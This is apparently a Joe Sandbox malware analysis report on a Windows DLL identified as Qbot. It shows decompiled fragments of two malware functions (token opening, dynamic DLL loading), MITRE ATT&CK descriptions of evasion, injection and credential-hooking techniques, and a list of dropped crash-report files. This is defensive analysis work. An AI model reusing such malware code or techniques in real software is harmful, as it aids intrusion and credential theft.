API ID: CommandLine$ArgvCurrentDirectorylstrlen
String ID:
API String ID: 159791187-0
Opcode ID: d7b43918f86b96083c8b0fe03adbf6b0033fba56821a7f560063e86af3058dc3
Instruction ID: f9acb4bf5c65e4b72caa321ed8be77fa79af63d7e515cc67f654de24e6e057c7
Opcode Fuzzy Hash: d7b43918f86b96083c8b0fe03adbf6b0033fba56821a7f560063e86af3058dc3
Instruction Fuzzy Hash: 0131B371D00119ABDB289FA9C894EAEB7BDEFC5318F204579D842E3191EB70F9818B51

Uniqueness

Uniqueness Score: -1.00%

Function 0494DB58 Relevance: 6.0, APIs: 4, Instructions: 33
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0494DB58(void* __ecx) {
				void* _v8;
				void* _t10;
				intOrPtr _t13;

				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
					L4:
					_t10 = _v8;
				} else {
					if(GetLastError() != 0x3f0) {
						L3:
						_t10 = 0;
					} else {
						_t13 =  *0x4960fa0; // 0x49ff8a0
						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x130))(), 8,  &_v8) != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				return _t10;
			}

0x0494db77
0x0494dba9
0x0494dba9
0x0494db79
0x0494db84
0x0494dba5
0x0494dba5
0x0494db86
0x0494db90
0x0494dba3
0x00000000
0x00000000
0x00000000
0x00000000
0x0494dba3
0x0494db84
0x0494dbae

APIs

GetCurrentThread.KERNEL32 ref: 0494DB6B
OpenThreadToken.ADVAPI32(00000000,?,?,0494DC9D,00000000,04940000), ref: 0494DB72
GetLastError.KERNEL32(?,?,0494DC9D,00000000,04940000), ref: 0494DB79
OpenProcessToken.ADVAPI32(00000000,?,?,0494DC9D,00000000,04940000), ref: 0494DB9E

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: OpenThreadToken$CurrentErrorLastProcess
String ID:
API String ID: 1515895013-0
Opcode ID: f198bdbef088f27ef8973dedb4f88b22fd592f2cc49aef898049d7e16844ae02
Instruction ID: 31a37798a5d18e8c3b5ae6c3dd7a943a810ee514382d427998e7dab3a2856807
Opcode Fuzzy Hash: f198bdbef088f27ef8973dedb4f88b22fd592f2cc49aef898049d7e16844ae02
Instruction Fuzzy Hash: 85F03A75654205EFEB80ABA4D849FAA7BECFB84200F144678E602D7150E668BE009B20

Uniqueness

Uniqueness Score: -1.00%

Function 0494A222 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107
libraryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0494A222(void* __ecx, void* __edx) {
				WCHAR* _v8;
				char _v12;
				char _v140;
				WCHAR* _t12;
				intOrPtr _t17;
				void* _t22;
				intOrPtr _t23;
				intOrPtr _t29;
				intOrPtr _t32;
				void* _t43;
				void* _t54;
				WCHAR* _t55;
				char* _t56;
				WCHAR* _t57;
				intOrPtr _t58;
				char _t60;
				struct HINSTANCE__* _t61;

				_t43 = 0;
				_t12 = E049490EA(__ecx, 0x152a);
				_t58 =  *0x4960fd8; // 0x49ffc50
				_t55 = _t12;
				_t59 = _t58 + 0xb0;
				_v8 = _t55;
				E0494C08E( &_v140, 0x40, L"%08x", E0494E605(_t59, E0494CE25(_t58 + 0xb0), 0));
				_t17 =  *0x4960fd8; // 0x49ffc50
				_t3 = _t17 + 0xa8; // 0x1
				asm("sbb eax, eax");
				_t22 = E049490EA(_t59, ( ~( *_t3) & 0x000010d8) + 0x2f7);
				_t56 = "\\";
				_t23 =  *0x4960fd8; // 0x49ffc50
				_t60 = E04949924(_t23 + 0x1020);
				_v12 = _t60;
				E04949D66( &_v8);
				_t29 =  *0x4960fd8; // 0x49ffc50
				_t57 = E04949924(_t29 + 0x122a);
				_t32 =  *0x4960fa0; // 0x49ff8a0
				_v8 = _t57;
				 *((intOrPtr*)(_t32 + 0x120))(_t60, _t57, 0, _t56,  &_v140, ".", L"dll", 0, _t56, _t22, _t56, _t55, 0);
				_t61 = LoadLibraryW(_t57);
				if(_t61 != 0) {
					_push(_t61);
					_t54 = 0x3c;
					_t43 = E04949446(0x495d9bc, _t54);
				}
				E0494913B( &_v12, 0xfffffffe);
				E049492A2( &_v140, 0, 0x80);
				if(_t43 != 0) {
					 *0x49610ac = _t61;
					 *0x49610b4 = _t57;
				} else {
					E0494913B( &_v8, 0xfffffffe);
				}
				return _t43;
			}

0x0494a233
0x0494a235
0x0494a23a
0x0494a240
0x0494a243
0x0494a249
0x0494a26c
0x0494a271
0x0494a276
0x0494a27e
0x0494a28b
0x0494a292
0x0494a299
0x0494a2aa
0x0494a2b0
0x0494a2b3
0x0494a2ca
0x0494a2de
0x0494a2e0
0x0494a2e5
0x0494a2eb
0x0494a2f8
0x0494a2fc
0x0494a2fe
0x0494a301
0x0494a30d
0x0494a30d
0x0494a315
0x0494a328
0x0494a332
0x0494a343
0x0494a349
0x0494a334
0x0494a33a
0x0494a340
0x0494a355

APIs

Part of subcall function 0494C08E: _vsnwprintf.MSVCRT ref: 0494C0AB

Part of subcall function 04949924: lstrcatW.KERNEL32(00000000,?), ref: 04949963

LoadLibraryW.KERNEL32(00000000), ref: 0494A2F2

Strings

dll, xrefs: 0494A2B9
%08x, xrefs: 0494A25E

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: LibraryLoad_vsnwprintflstrcat
String ID: %08x$dll
API String ID: 1445519121-2963171978
Opcode ID: 2ba58d10322c1d1795cfce52700b006374c3105eb1738389ac141fb78479b543
Instruction ID: 69cc52d13545eb006dc8726c1439aceccfbab89e53df89ace8d4473c0483cc2d
Opcode Fuzzy Hash: 2ba58d10322c1d1795cfce52700b006374c3105eb1738389ac141fb78479b543
Instruction Fuzzy Hash: B831A7B2A44214BBEB20E675DC45F9F37ACDBC9714F108179F504E72C0EA78AD458760

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report F072.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Qbot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_792f64dfd282ce5c1f3ccd2775d0d855d365cbe7_82810a17_0b56d8a5\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_792f64dfd282ce5c1f3ccd2775d0d855d365cbe7_82810a17_162eca2e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_875735debeb93db2959d1fbfa047a3f67cf9964f_82810a17_1626d8b5\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_875735debeb93db2959d1fbfa047a3f67cf9964f_82810a17_1adebbd6\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_875735debeb93db2959d1fbfa047a3f67cf9964f_82810a17_1af2bbb7\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF34.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF92.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB0FA.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB119.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB159.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB188.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC3F5.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC51E.tmp.WERInternalMetadata.xml

Windows Analysis Report
F072.dll